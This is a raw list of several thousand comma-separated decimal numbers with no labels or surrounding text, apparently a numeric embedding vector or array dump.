0.02129264548420906, 0.02217339351773262, -0.03051668219268322, 0.0014877477660775185, -0.01709124632179737, 0.023720650002360344, 0.008795564994215965, -0.022328119724988937, 0.03177829459309578, -0.02937409281730652, 0.005501691251993179, 0.0494646392762661, 0.010342822410166264, -0.002249474637210369, -0.04798879101872444, -0.021828236058354378, 0.021280745044350624, -0.03763406723737717, -0.022328119724988937, 0.022125784307718277, 0.0031510498374700546, -0.012818435207009315, 0.0010451427660882473, -0.006546090357005596, -0.06108097359538078, -0.028231501579284668, 0.0011009334120899439, -0.02473231963813305, 0.03149264678359032, 0.010961725376546383, 0.0077303373254835606, 0.02623196877539158, -0.002429492073133588, -0.011009333655238152, -0.017543522641062737, -0.006337805651128292, 0.028493346646428108, -0.01809101365506649, 0.012699414975941181, -0.04106183722615242, -0.011223569512367249, 0.020435703918337822, -0.05246393755078316, 0.01838856190443039, 0.02367304265499115, 0.02311364933848381, -0.0074684941209852695, 0.03868144378066063, -0.0452275313436985, 0.00004184290810371749, 0.032087743282318115, 0.04808400943875313, -0.03501563146710396, 0.0058974321000278, -0.00942637026309967, 0.002233109436929226, 0.03982403129339218, 0.0007505687535740435, 0.017638737335801125, -0.04279952868819237, 0.013603965751826763, -0.0459892600774765, -0.024708515033125877, -0.001709422213025391, -0.011140255257487297, 0.0070459735579788685, 0.0046715280041098595, 0.009729870595037937, 0.016436638310551643, -0.0233754925429821, -0.02303033508360386, 0.005736755672842264, -0.02363733761012554, -0.014603732153773308, -0.0012742560356855392, -0.036848537623882294, -0.0074922977946698666, 0.009039555676281452, -0.016996031627058983, 0.016222402453422546, 0.006772228050976992, 0.07203079760074615, 0.012092414312064648, -0.03980023041367531, -0.03846720606088638, -0.052559152245521545, -0.0027493578381836414, -0.016305716708302498, 0.0056891473941504955, 0.03944316878914833, 0.0022673276253044605, -0.0023402273654937744, -0.03492041677236557, -0.003692589933052659, 0.021625902503728867, -0.022958923131227493, 0.01317549403756857, 0.016543755307793617, -0.005662368144840002, -0.000971499306615442, 0.02387537620961666, -0.043918315321207047, -0.007331620901823044, 0.04268050938844681, 0.04453721642494202, 0.00571295153349638, 0.010360675863921642, 0.019781094044446945, 0.024065807461738586, 0.035824965685606, 0.01656755991280079, 0.00878366269171238, -0.014175261370837688, 0.038514815270900726, -0.01007502805441618, 0.03177829459309578, -0.0222329031676054, -0.021875843405723572, -0.0019355599069967866, 0.03482520207762718, 0.004451341461390257, 0.022197196260094643, -0.02035238966345787, -0.014318084344267845, -0.023661140352487564, 0.009444222785532475, -0.010682028718292713, 0.005070244427770376, -0.013020768761634827, 0.013972926884889603, 0.03941936418414116, -0.02863616868853569, -0.007367326878011227, -0.03803873434662819, 0.01406814344227314, 0.0009112455300055444, -0.0009343056008219719, 0.004430512897670269, -0.004689380992203951, -0.0364200659096241, -0.03444433584809303, -0.000033823016565293074, 0.01165799144655466, -0.02877899259328842, 0.00045413500629365444, -0.009658458642661572, -0.026303380727767944, -0.009229986928403378, 0.0034724033903330564, -0.02347070910036564, 0.002076895907521248, -0.0013612891780212522, 0.04498949274420738, 0.006736522074788809, -0.030873741954565048, -0.01753162033855915, -0.004240081179887056, -0.014460908249020576, -0.013853907585144043, 0.022101981565356255, -0.008747956715524197, -0.03168307617306709, -0.030088210478425026, 0.03232578560709953, 0.034372925758361816, 0.03615822270512581, -0.06279485672712326, -0.0010719222482293844, 0.02114982344210148, 0.018959857523441315, -0.012026953510940075, -0.022899413481354713, 0.0026362889911979437, 0.02231621742248535, -0.021518783643841743, 0.005477887578308582, -0.010705833323299885, -0.012568493373692036, -0.0035824966616928577, 0.011741305701434612, 0.02203056961297989, 0.012949356809258461, 0.010199998505413532, 0.0056891473941504955, 0.03720559552311897, -0.029493112117052078, -0.016579462215304375, -0.018781328573822975, -0.00672462023794651, -0.00488278828561306, -0.009491831064224243, -0.012770826928317547, -0.022423334419727325, 0.02297082543373108, -0.019578760489821434, -0.0015829636249691248, -0.03656288981437683, 0.0017748831305652857, 0.015163125470280647, 0.016734186559915543, -0.012211433611810207, -0.0335397869348526, -0.05322566628456116, 0.006064060144126415, 0.0032700696028769016, -0.0037431735545396805, 0.01674608886241913, -0.0400620736181736, 0.014318084344267845, -0.02411341667175293, -0.029207464307546616, -0.011931736953556538, 0.03689614683389664, -0.013354023918509483, 0.005367794074118137, -0.00650443322956562, -0.0025321466382592916, -0.006486580241471529, -0.020459508523344994, -0.029064640402793884, 0.006528237368911505, 0.02963593602180481, 0.027684010565280914, -0.0028401105664670467, 0.000717094459105283, 0.03965740650892258, 0.04110944643616676, -0.03589637950062752, 0.01726977713406086, 0.009747723117470741, 0.025089379400014877, -0.03613441810011864, -0.0030067383777350187, -0.015115517191588879, -0.01325880829244852, -0.040514346212148666, 0.01865040697157383, 0.025898713618516922, 0.00687934597954154, 0.03677712380886078, -0.01212812028825283, -0.005974795203655958, -0.01058681309223175, -0.028612365946173668, 0.010515401139855385, 0.033611197024583817, -0.031944919377565384, 0.02258996292948723, -0.027707815170288086, -0.002322374377399683, -0.004168669227510691, -0.008004083298146725, -0.003755075391381979, 0.007742239627987146, -0.055701278150081635, -0.01494888961315155, 0.05689147487282753, -0.029826367273926735, 0.04637012258172035, 0.005796265322715044, 0.0032492412719875574, 0.06065250188112259, -0.0072840130887925625, -0.019245505332946777, -0.02331598289310932, -0.003219486214220524, -0.004240081179887056, 0.007153091486543417, -0.04856008663773537, 0.0015197343891486526, -0.003115343861281872, -0.022780394181609154, 0.03580116108059883, -0.012699414975941181, 0.0532732717692852, -0.02939789555966854, -0.0019697779789566994, 0.006031329743564129, 0.011800815351307392, 0.024708515033125877, -0.05236872285604477, -0.031944919377565384, 0.029493112117052078, 0.02349451370537281, 0.00340694235637784, 0.00016114168101921678, -0.0643659234046936, -0.006557992193847895, -0.014794164337217808, 0.01311598438769579, -0.010711784474551678, 0.014056241139769554, -0.009105016477406025, 0.038752853870391846, -0.005674269981682301, 0.0017570301424711943, 0.013889613561332226, -0.03882426768541336, 0.0362534373998642, -0.0075875138863921165, -0.006885296665132046, 0.047036632895469666, 0.0017466158606112003, -0.005611784756183624, 0.022197196260094643, -0.05365413799881935, -0.00014115007070358843, 0.019424034282565117, 0.02225670777261257, -0.0178291704505682, -0.045394159853458405, -0.033611197024583817, -0.0025886811781674623, -0.035991594195365906, -0.06070011109113693, 0.00979533139616251, -0.031944919377565384, -0.003466452471911907, 0.0031183194369077682, -0.04332321509718895, -0.03275425359606743, -0.006194981746375561, 0.007528003770858049, -0.01181866880506277, 0.021947255358099937, 0.03306370601058006, -0.00979533139616251, -0.029445504769682884, -0.008617035113275051, 0.028802797198295593, -0.01438949629664421, 0.037348419427871704, 0.05612974986433983, -0.057224731892347336, -0.031611666083335876, -0.04268050938844681, -0.02813628688454628, -0.0032641186844557524, 0.027231736108660698, 0.014901282265782356, 0.009432321414351463, -0.04394211992621422, -0.017376894131302834, 0.010205949656665325, 0.007748190313577652, 0.03706277161836624, 0.02637479268014431, 0.016936520114541054, -0.018864642828702927, 0.005894456524401903, -0.012770826928317547, -0.011449706740677357, 0.007908867672085762, -0.013842005282640457, -0.003148074261844158, 0.0010786171769723296, 0.023339787498116493, 0.011961492709815502, -0.02863616868853569, 0.007533954922109842, -0.023077944293618202, 0.006034304853528738, -0.018055306747555733, 0.015520185232162476, 0.0022003790363669395, 0.03175448998808861, -0.00506726885214448, 0.0012638417538255453, 0.028802797198295593, 0.009670360945165157, 0.007147140335291624, 0.0028118432965129614, 0.009307350032031536, -0.006070010829716921, -0.04246627166867256, -0.004861959721893072, -0.006885296665132046, -0.019066976383328438, 0.014294280670583248, -0.02173301950097084, -0.022506648674607277, 0.02513698674738407, -0.02573208510875702, 0.035848770290613174, -0.005525495391339064, -0.0022688154131174088, -0.03615822270512581, -0.00451680226251483, -0.00411213468760252, -0.0044275373220443726, -0.0034456239081919193, 0.0035081093665212393, 0.023720650002360344, 0.003698541084304452, -0.022161491215229034, -0.016781795769929886, 0.005945040378719568, 0.011812717653810978, -0.0008405775297433138, 0.004558459389954805, 0.02153068594634533, 0.002582730259746313, 0.016900815069675446, -0.0015621351776644588, -0.03254001960158348, -0.005052391439676285, -0.01885274052619934, 0.02020956575870514, -0.002738943789154291, -0.019697781652212143, 0.02501796744763851, 0.018436171114444733, 0.007081679534167051, 0.0018611724954098463, -0.048417262732982635, 0.023018434643745422, -0.036848537623882294, 0.003085589036345482, -0.028683777898550034, 0.011842472478747368, 0.003740197978913784, 0.021887745708227158, -0.009712017141282558, 0.05146417021751404, -0.009366859681904316, -0.007748190313577652, 0.015032203868031502, 0.023661140352487564, -0.027279343456029892, 0.02925507351756096, 0.025470241904258728, 0.025946320965886116, 0.00988459587097168, 0.010789146646857262, -0.014901282265782356, -0.007682729512453079, -0.009759625419974327, -0.03313511982560158, 0.01274702325463295, -0.012568493373692036, 0.02475612238049507, -0.00894434005022049, -0.022423334419727325, -0.0020188738126307726, 0.019697781652212143, -0.020340487360954285, 0.02661283314228058, 0.03065950609743595, -0.02331598289310932, 0.011312833987176418, 0.0020977244712412357, -0.0010086930124089122, -0.030088210478425026, -0.00279399030841887, 0.02613675408065319, 0.00021646730601787567, -0.006302099674940109, -0.015936754643917084, 0.0040764291770756245, -0.02927887625992298, -0.017983894795179367, -0.0024890019558370113, -0.022804198786616325, -0.03656288981437683, 0.024280043318867683, 0.01618669554591179, -0.013342122547328472, -0.023958690464496613, 0.01650805026292801, -0.03313511982560158, 0.002245011506602168, 0.045656003057956696, 0.040633369237184525, 0.009717968292534351, 0.02023337036371231, 0.02851714938879013, 0.010182145982980728, 0.006611551158130169, -0.03275425359606743, 0.023542121052742004, 0.03568214178085327, -0.0011306883534416556, -0.0045465570874512196, 0.005079171154648066, -0.0415855273604393, 0.02229241281747818, 0.042870938777923584, -0.00903360452502966, -0.01063442137092352, 0.01538926362991333, 0.008706300519406796, 0.019685879349708557, -0.01165799144655466, 0.03256382420659065, 0.01788868010044098, -0.012056708335876465, -0.0013984829420223832, -0.016781795769929886, 0.0019310966599732637, 0.07303056120872498, -0.0007743727182969451, -0.006569894030690193, -0.01268751360476017, -0.023542121052742004, -0.01991201564669609, 0.011580629274249077, -0.00988459587097168, 0.0018477827543392777, -0.01882893592119217, 0.004930396098643541, 0.019257407635450363, 0.01600816659629345, 0.0022212073672562838, -0.02217339351773262, -0.016579462215304375, -0.0025589261204004288, -0.029612131416797638, 0.03065950609743595, -0.015663009136915207, 0.026327185332775116, 0.014163359068334103, -0.0002919705002568662, 0.00196382706053555, 0.0444658063352108, -0.023256473243236542, -0.04410874471068382, -0.0003356731031090021, 0.009557291865348816, -0.009366859681904316, -0.04858389124274254, 0.0015398189425468445, 0.03115938976407051, 0.003002275014296174, -0.025660673156380653, -0.012318551540374756, -0.008837222121655941, -0.012366159819066525, -0.04008587822318077, 0.011610384099185467, 0.0109260194003582, 0.01027736160904169, -0.026184361428022385, 0.0068971989676356316, 0.01650805026292801, 0.033111315220594406, -0.041490308940410614, -0.015234537422657013, 0.015543988905847073, -0.0044424147345125675, -0.0141871627420187, 0.012973160482943058, -0.014663241803646088, -0.00911691877990961, 0.010693931020796299, 0.005180337931960821, -0.01662706956267357, 0.004135938826948404, 0.04129987955093384, -0.03744363784790039, -0.014115750789642334, -0.01961446739733219, -0.037348419427871704, -0.011253324337303638, -0.020602330565452576, 0.017495913431048393, 0.0036420065443962812, 0.02211388386785984, 0.05917665734887123, -0.04199019446969032, 0.004799474496394396, 0.038848068565130234, -0.010943872854113579, -0.024303847923874855, -0.011693697422742844, -0.031230801716446877, 0.021685412153601646, -0.012378061190247536, -0.0052190194837749004, -0.000685851729940623, -0.003427770920097828, 0.006433021277189255, -0.011782962828874588, -0.003234363626688719, 0.005531446076929569, -0.00017667004431132227, 0.013461141847074032, -0.006718669086694717, -0.0014832845190539956, -0.015032203868031502, 0.009057408198714256, -0.024946555495262146, 0.0003563156060408801, 0.0022509624250233173, -0.00008972978685051203, -0.036372456699609756, -0.011158108711242676, -0.020257173106074333, 0.003427770920097828, 0.0006613038713112473, 0.01903126947581768, 0.020376194268465042, 0.003766977461054921, 0.033325549215078354, 0.015044105239212513, -0.020423801615834236, -0.028969425708055496, 0.018745621666312218, 0.01462753675878048, -0.003049883060157299, -0.012830336578190327, -0.00807549525052309, 0.012211433611810207, 0.03570594638586044, 0.00034050826798193157, -0.009360909461975098, -0.002297082683071494, -0.0174483060836792, -0.030064407736063004, 0.012485179118812084, -0.007533954922109842, -0.006165226921439171, 0.0024592471309006214, -0.02255425602197647, -0.0032849470153450966, 0.013782495632767677, 0.016579462215304375, 0.0018924152245745063, -0.0479411855340004, -0.014770359732210636, -0.003517035860568285, -0.00022557975898962468, -0.03077852725982666, -0.0020278003066778183, 0.0009789380710572004, -0.013842005282640457, -0.008146907202899456, -0.0364200659096241, 0.02349451370537281, -0.017138853669166565, 0.004129987675696611, 0.01393722090870142, -0.0011500290129333735, 0.000993071706034243, -0.022459041327238083, -0.0012400377308949828, -0.0040704780258238316, -0.0005478631355799735, 0.005501691251993179, 0.00045413500629365444, 0.016043871641159058, -0.00016197854711208493, 0.03865763917565346, -0.02217339351773262, 0.017281677573919296, -0.024565691128373146, -0.009122868999838829, -0.03251621499657631, 0.013603965751826763, 0.013080278411507607, -0.03991924971342087, 0.017900580540299416, 0.01305647473782301, 0.0058974321000278, 0.023887278512120247, -0.0014453469775617123, -0.03037385828793049, 0.05941469594836235, -0.01817432790994644, 0.0030097137205302715, 0.020316684618592262, 0.02041189931333065, 0.008670594543218613, 0.03254001960158348, -0.010908166877925396, 0.022661374881863594, 0.005073220003396273, -0.01938832923769951, -0.03303990140557289, -0.015210733748972416, 0.00878366269171238, -0.03544410318136215, 0.005811142735183239, -0.03670571371912956, 0.027160324156284332, 0.011610384099185467, 0.01876942627131939, 0.0032373392023146152, -0.009789380244910717, -0.014603732153773308, -0.010664176195859909, 0.004582263063639402, -0.02639859728515148, -0.001693057012744248, 0.04079999402165413, -0.04256149008870125, 0.024470476433634758, 0.021364057436585426, -0.02120933309197426, 0.007510150782763958, -0.024922750890254974, 0.012818435207009315, 0.015056007541716099, 0.011973394080996513, -0.002520244801416993, 0.008759859018027782, 0.004716160707175732, -0.024339552968740463, 0.021328352391719818, -0.013163592666387558, 0.028445737436413765, 0.0030617848969995975, 0.01823383755981922, -0.03192111849784851, 0.02437525987625122, -0.010301165282726288, -0.008015984669327736, -0.019185995683073997, -0.04834585264325142, -0.02041189931333065, -0.02287561073899269, 0.0004957919591106474, -0.02763640321791172, -0.003386114025488496, 0.018340954557061195, 0.02777922712266445, 0.003287922590970993, 0.001314425142481923, 0.007420885842293501, -0.01525834109634161, 0.007718435488641262, -0.03653908520936966, -0.0025678526144474745, 0.029040837660431862, -0.0232921801507473, 0.0031897311564534903, 0.035110846161842346, -0.001984655624255538, 0.0098250862210989, -0.002996324095875025, -0.02017386071383953, 0.0017466158606112003, -0.02073325403034687, -0.030921349301934242, 0.009146673604846, -0.04229964688420296, -0.025851106271147728, -0.027279343456029892, 0.0003578033356461674, -0.02737456001341343, 0.020721351727843285, -0.025327417999505997, -0.029350288212299347, -0.03994305431842804, 0.0015710616717115045, -0.031064173206686974, 0.03037385828793049, -0.008837222121655941, -0.012068609707057476, 0.002795478096231818, 0.0027285295072942972, 0.006694864947348833, 0.009360909461975098, 0.0006966379005461931, 0.015543988905847073, 0.007599415723234415, 0.01870991662144661, -0.026065342128276825, 0.01086650975048542, 0.0041894977912306786, 0.03958599269390106, -0.0009008313063532114, -0.02437525987625122, -0.00607893755659461, -0.00672462023794651, -0.014139555394649506, 0.017115050926804543, 0.006825787015259266, -0.01712695322930813, -0.002676458330824971, -0.01151516754180193, 0.01300886645913124, 0.013615868054330349, -0.03387304022908211, -0.00841470155864954, 0.03368261083960533, -0.0023818842601031065, 0.011449706740677357, -0.030112015083432198, -0.0119852963835001, -0.005671294406056404, -0.0030156648717820644, 0.044799063354730606, 0.0067127179354429245, 0.055844102054834366, 0.007956475019454956, 0.016162892803549767, -0.004055600613355637, 0.033730216324329376, -0.0004574824415612966, -0.018221935257315636, -0.02079276368021965, 0.007658925838768482, 0.01797199249267578, 0.013151690363883972, -0.005930162500590086, -0.004451341461390257, 0.0014565050369128585, 0.008396848104894161, -0.013782495632767677, -0.03115938976407051, 0.015960559248924255, -0.027041302993893623, 0.005358867347240448, -0.04889334365725517, 0.0207094494253397, -0.013842005282640457, -0.0025023918133229017, -0.01030711643397808, 0.013330220244824886, 0.016615167260169983, -0.008408750407397747, 0.0042043752036988735, -0.02373255230486393, -0.03327794373035431, -0.032706648111343384, -0.03477759286761284, 0.0036122517194598913, -0.018578995019197464, -0.02147117629647255, 0.036372456699609756, -0.00522199459373951, -0.0029383020009845495, 0.027326950803399086, 0.0005277785239741206, -0.001137383165769279, 0.013484946452081203, -0.00598372146487236, -0.01449661422520876, -0.0062366388738155365, 0.007087630685418844, -0.01788868010044098, -0.004421586636453867, -0.0025782668963074684, -0.023827768862247467, 0.003859217744320631, 0.003091539954766631, 0.00019136155606247485, 0.013687280006706715, 0.005430279299616814, 0.02009054645895958, -0.014163359068334103, 0.0009834013180807233, -0.024518083781003952, -0.01215787511318922, -0.0076113175600767136, 0.007444689981639385, 0.034372925758361816, -0.01941213384270668, -0.005543348379433155, 0.004198424052447081, 0.029421700164675713, 0.00019015275756828487, -0.0002200007002102211, 0.0020218491554260254, -0.0011797839542850852, 0.018936054781079292, 0.015663009136915207, -0.03013581968843937, 0.024589495733380318, 0.02323266863822937, -0.004341247957199812, -0.0029115225188434124, -0.007819602265954018, -0.03932414948940277, -0.013687280006706715, -0.008254025131464005, -0.012330453842878342, -0.00922403670847416, 0.0008145419415086508, 0.007760092616081238, 0.007307817228138447, -0.0016142063541337848, -0.031349822878837585, 0.026065342128276825, -0.020078644156455994, -0.0030469074845314026, 0.004472170025110245, -0.01108669675886631, -0.0028490370605140924, -0.007748190313577652, -0.024018200114369392, 0.004490023013204336, 0.006421119440346956, 0.012175727635622025, -0.0045227534137666225, -0.011800815351307392, 0.034087277948856354, 0.024660907685756683, -0.0009000874124467373, 0.027160324156284332, -0.006956708617508411, 0.023542121052742004, 0.02599393017590046, 0.005186288617551327, 0.018436171114444733, 0.007278062403202057, 0.009920301847159863, 0.023089846596121788, 0.011812717653810978, -0.022244805470108986, 0.008861025795340538, -0.03480139747262001, -0.006772228050976992, 0.02687467634677887, 0.03665810450911522, -0.0023655190598219633, -0.003900874638929963, -0.03394445404410362, -0.02399439550936222, 0.021661607548594475, -0.012937454506754875, 0.020661842077970505, -0.012889847159385681, -0.014401398599147797, 0.007974328473210335, 0.01449661422520876, 0.02347070910036564, -0.01055705826729536, 0.008795564994215965, -0.014353790320456028, -0.0021066509652882814, 0.022137686610221863, 0.005540372803807259, 0.015151223167777061, -0.0232921801507473, -0.02255425602197647, 0.019685879349708557, -0.01274702325463295, -0.009753674268722534, -0.020423801615834236, 0.006004550028592348, 0.018876543268561363, 0.0027984536718577147, 0.022447139024734497, -0.0008323948713950813, 0.009753674268722534, 0.00604918273165822, 0.005448132287710905, 0.03280186280608177, 0.011372344568371773, -0.0012869018828496337, -0.003085589036345482, 0.02209007926285267, -0.027184126898646355, 0.006563943345099688, -0.02711271494626999, 0.021959157660603523, 0.04472764953970909, -0.048155419528484344, 0.0039038502145558596, 0.005701049696654081, -0.012913650833070278, -0.0015680862125009298, 0.006072986405342817, -0.017733953893184662, -0.017138853669166565, -0.015734421089291573, -0.004963126499205828, -0.05360652878880501, -0.007266160100698471, -0.006061084568500519, 0.03444433584809303, 0.01712695322930813, -0.006498482543975115, -0.019935820251703262, -0.030112015083432198, 0.012110266834497452, -0.0031183194369077682, -0.003838389413431287, 0.000987120671197772, -0.011062892153859138, 0.004228179343044758, -0.008373044431209564, 0.008777711540460587, -0.0028535001911222935, -0.0008993435185402632, -0.02017386071383953, 0.012366159819066525, 0.012116217985749245, -0.020626135170459747, 0.027350755408406258, -0.010949824005365372, 0.005834946874529123, 0.0207094494253397, -0.03280186280608177, 0.015222635120153427, -0.016615167260169983, -0.00920618325471878, -0.0046655768528580666, 0.008170710876584053, -0.013699181377887726, -0.00035761736216954887, 0.013651574030518532, -0.0163890291005373, 0.006605600006878376, 0.023625435307621956, 0.0109260194003582, -0.0038621933199465275, 0.0031361724250018597, 0.0011098599061369896, -0.004129987675696611, 0.004049649462103844, -0.004748891107738018, -0.007432788144797087, -0.028041070327162743, -0.013544456101953983, -0.03501563146710396, 0.016579462215304375, 0.007414935156702995, 0.0143775949254632, 0.0038562421686947346, -0.02649381197988987, -0.0042043752036988735, 0.01268751360476017, 0.031849704682826996, 0.003466452471911907, -0.0006929185474291444, -0.009069310501217842, -0.011574678122997284, -0.007099532522261143, -0.0030617848969995975, 0.010937921702861786, -0.0025663648266345263, 0.006302099674940109, 0.006456825416535139, 0.018578995019197464, 0.02255425602197647, -0.0371817946434021, 0.0025782668963074684, 0.00906335934996605, 0.023601630702614784, 0.0008331387653015554, 0.013151690363883972, 0.008188563399016857, -0.0037223449908196926, -0.02279229648411274, 0.025517849251627922, -0.00036338239442557096, 0.015901047736406326, 0.006825787015259266, -0.022637570276856422, 0.004284713417291641, 0.013544456101953983, 0.007432788144797087, -0.01080700010061264, -0.04003826901316643, 0.004867910873144865, -0.010116685181856155, -0.018257640302181244, 0.006325903814285994, 0.0017733953427523375, 0.006200932897627354, -0.0007598671945743263, 0.022744689136743546, 0.026303380727767944, -0.010664176195859909, -0.020638037472963333, 0.008765810169279575, -0.005281504709273577, -0.018400464206933975, -0.017460208386182785, 0.02497035823762417, 0.011104549281299114, 0.03532508388161659, 0.013770593330264091, 0.012675611302256584, 0.013603965751826763, 0.0038562421686947346, 0.010319018736481667, 0.0029219365678727627, -0.026089144870638847, -0.0312546044588089, -0.00004618991806637496, -0.02915985696017742, -0.027422167360782623, -0.010182145982980728, -0.00340694235637784, 0.016579462215304375, 0.000493560335598886, 0.0018135645659640431, -0.007647023536264896, -0.01715075597167015, -0.02347070910036564, 0.008343289606273174, -0.01300886645913124, 0.006498482543975115, 0.017983894795179367, -0.029326483607292175, -0.034991826862096786, -0.0008487601298838854, 0.03303990140557289, 0.0229113157838583, 0.01196744292974472, 0.006605600006878376, -0.006718669086694717, 0.02635098807513714, -0.0329446867108345, -0.015056007541716099, 0.0002445485442876816, 0.025422634556889534, 0.02811248227953911, -0.03232578560709953, 0.015222635120153427, 0.023446904495358467, 0.0283743254840374, 0.02317315898835659, 0.003725320566445589, 0.0012489642249420285, -0.012050757184624672, 0.02361353300511837, 0.023006532341241837, -0.0071352384984493256, -0.013782495632767677, 0.0370151661336422, 0.011289030313491821, 0.011717502027750015, 0.01556779257953167, 0.01268751360476017, 0.001609743107110262, 0.010271410457789898, 0.01600816659629345, 0.013163592666387558, 0.034491945058107376, 0.017424501478672028, -0.0001978704531211406, -0.006498482543975115, 0.010086930356919765, -0.01618669554591179, -0.0193526241928339, -0.02463710308074951, -0.009628703817725182, 0.013246905989944935, -0.012973160482943058, -0.009468027390539646, -0.005727828945964575, 0.015210733748972416, 0.013580162078142166, 0.0028535001911222935, 0.015270243398845196, -0.0018001748248934746, -0.01953115314245224, 0.006171178072690964, 0.022863708436489105, -0.0009268668945878744, -0.019162191078066826, 0.052321113646030426, -0.016353324055671692, -0.007896965369582176, -0.0029903731774538755, -0.004385880660265684, 0.03101656585931778, 0.005817093886435032, 0.015246439725160599, -0.038990892469882965, -0.05151177942752838, -0.023304080590605736, -0.01876942627131939, 0.00900384970009327, -0.00881341751664877, -0.022863708436489105, -0.006546090357005596, 0.006617502309381962, -0.014425202272832394, 0.009914351627230644, 0.024137219414114952, 0.01817432790994644, -0.028445737436413765, -0.02193535305559635, 0.019983427599072456, 0.014532320201396942, 0.025041770190000534, -0.004609042778611183, 0.00838494673371315, 0.005861726123839617, 0.02963593602180481, 0.01709124632179737, -0.020019134506583214, 0.008837222121655941, -0.006337805651128292, 0.022328119724988937, 0.02017386071383953, -0.02431575022637844, 0.0009134771535173059, -0.002866890048608184, 0.00485303346067667, -0.0009662921656854451, -0.0016275960952043533, 0.059462305158376694, 0.019745388999581337, -0.008152858354151249, -0.008486113511025906, -0.006373511627316475, 0.022018667310476303, 0.02076895907521248, -0.010092880576848984, 0.0061176191084086895, -0.008254025131464005, -0.012413767166435719, -0.017543522641062737, 0.010943872854113579, -0.015317851677536964, -0.003392064943909645, 0.01697222702205181, -0.025517849251627922, -0.005900407675653696, -0.0034039670135825872, -0.00011167406773893163, 0.004820303060114384, 0.016115283593535423, 0.0087241530418396, 0.0251131821423769, -0.017983894795179367, 0.0002815562766045332, -0.0211736261844635, -0.013580162078142166, -0.020578527823090553, 0.04970267787575722, 0.0034724033903330564, -0.005043465178459883, 0.0021840138360857964, 0.003392064943909645, 0.004249007906764746, -0.008575377985835075, -0.011616334319114685, 0.014008632861077785, -0.0073732780292630196, 0.020388096570968628, 0.008486113511025906, -0.00273150485008955, 0.0157106164842844, 0.014556124806404114, -0.03932414948940277, 0.029207464307546616, 0.001480309059843421, 0.00402287021279335, -0.021542588248848915, -0.0016275960952043533, 0.013044572435319424, -0.007450641132891178, -0.03991924971342087, 0.006516335532069206, 0.01794818975031376, 0.02461330033838749, -0.0143775949254632, -0.014532320201396942, -0.024042004719376564, 0.02073325403034687, -0.021768726408481598, 0.0005880323005840182, -0.022221000865101814, -0.0014267500955611467, 0.01674608886241913, -0.019757291302084923, -0.008575377985835075, -0.020923685282468796, 0.01544877327978611, 0.004668552428483963, 0.01381820160895586, 0.04608447477221489, -0.0015249415300786495, -0.0074982489459216595, 0.005522519815713167, 0.013282611966133118, 0.014603732153773308, 0.020007232204079628, -0.011074794456362724, 0.008289731107652187, -0.006778178736567497, -0.03101656585931778, 0.005843873135745525, -0.009420419111847878, -0.012080512009561062, -0.024565691128373146, -0.006248540710657835, -0.028683777898550034, 0.02197105996310711, 0.03772928565740585, -0.00869439821690321, 0.017983894795179367, 0.002610997296869755, -0.002975495532155037, -0.004856008570641279, 0.03187350928783417, 0.015579694882035255, -0.03868144378066063, -0.010503499768674374, -0.00951563473790884, 0.008450407534837723, 0.007593464571982622, -0.02105460688471794, -0.0010153878247365355, 0.00906335934996605, -0.0006761814001947641, 0.0071887974627316, 0.008111201226711273, -0.0063794623129069805, 0.01691271737217903, 0.010592764243483543, -0.018864642828702927, -0.013461141847074032, -0.022506648674607277, -0.009646556340157986, 0.02813628688454628, 0.00020251967362128198, 0.01947164349257946, -0.0018715867772698402, -0.01268751360476017, -0.0027285295072942972, 0.0008405775297433138, -0.02749357931315899, -0.02303033508360386, -0.007843405939638615, -0.007783896289765835, -0.022447139024734497, 0.01187817845493555, 0.015424968674778938, 0.01556779257953167, 0.002404200378805399, -0.011580629274249077, -0.006956708617508411, -0.03456335514783859, -0.03025483898818493, 0.013032671064138412, 0.008807467296719551, -0.02226860821247101, -0.024422867223620415, 0.012592297047376633, -0.015067909844219685, -0.03189731389284134, 0.00045115951797924936, 0.005582029931247234, -0.00844445638358593, 0.005739730782806873, -0.0016201573889702559, 0.004525728989392519, -0.0004444646474439651, 0.007355425041168928, 0.03784830495715141, -0.002544048707932234, 0.01800769940018654, 0.021280745044350624, 0.03603920340538025, -0.017055541276931763, -0.007908867672085762, -0.015901047736406326, -0.0031034417916089296, -0.005284480284899473, -0.012306650169193745, -0.009408516809344292, -0.011009333655238152, -0.006105716805905104, -0.018924152478575706, -0.01443710457533598, -0.01286604255437851, 0.007182846311479807, -0.004290664568543434, 0.02258996292948723, 0.029683543369174004, -0.006325903814285994, -0.019923917949199677, -0.012223335914313793, 0.010021469555795193, 0.04729847609996796, 0.005016685463488102, 0.008991947397589684, -0.008997898548841476, -0.0005006271530874074, -0.021899648010730743, -0.02361353300511837, 0.0327780582010746, 0.038110148161649704, 0.02761259861290455, 0.000799664412625134, 0.008004083298146725, -0.006510384380817413, -0.0004366539651528001, -0.006772228050976992, -0.012520885095000267, 0.009343056008219719, -0.0006345244473777711, 0.028445737436413765, -0.0031123682856559753, 0.016436638310551643, 0.01412765309214592, -0.025327417999505997, 0.00866464339196682, -0.006665110122412443, 0.007147140335291624, -0.023137453943490982, -0.014175261370837688, -0.00411213468760252, 0.004659626167267561, 0.02391108311712742, -0.004246032331138849, 0.007986229844391346, -0.030445270240306854, -0.02449427917599678, 0.006349707487970591, -0.0026615806855261326, -0.01513932179659605, -0.01817432790994644, 0.012639905326068401, 0.004793523345142603, -0.0039812130853533745, 0.0040853554382920265, 0.006825787015259266, -0.015532086603343487, -0.01406814344227314, 0.002939789555966854, -0.011009333655238152, -0.020542820915579796, 0.025946320965886116, -0.00038569862954318523, -0.027350755408406258, 0.029231268912553787, 0.0035765457432717085, -0.00788506306707859, 0.004582263063639402, -0.008129053749144077, -0.0013084742240607738, -0.009081212803721428, 0.017674444243311882, -0.008801516145467758, 0.0021587221417576075, 0.002871353179216385, 0.0077065336517989635, -0.008301632478833199, -0.019435936585068703, -0.04272811487317085, 0.007980279624462128, -0.0059331380762159824, 0.03025483898818493, -0.009717968292534351, 0.0014884916599839926, -0.02331598289310932, 0.006067035719752312, 0.021661607548594475, -0.014318084344267845, -0.008521819487214088, 0.007224503438919783, 0.021280745044350624, 0.003520011203363538, -0.0034039670135825872, 0.002679433673620224, -0.009009800851345062, -0.0011076282244175673, 0.025446439161896706, 0.019364524632692337, 0.026065342128276825, 0.0010711783543229103, 0.021185528486967087, 0.011283079162240028, -0.02689848095178604, 0.0013337659183889627, 0.010485646314918995, 0.000467524747364223, 0.01412765309214592, -0.005016685463488102, 0.01647234335541725, 0.046393927186727524, -0.01182461902499199, -0.012604199349880219, -0.0022881561890244484, -0.006653208285570145, -0.021256940439343452, 0.032349586486816406, 0.012223335914313793, 0.002457759343087673, 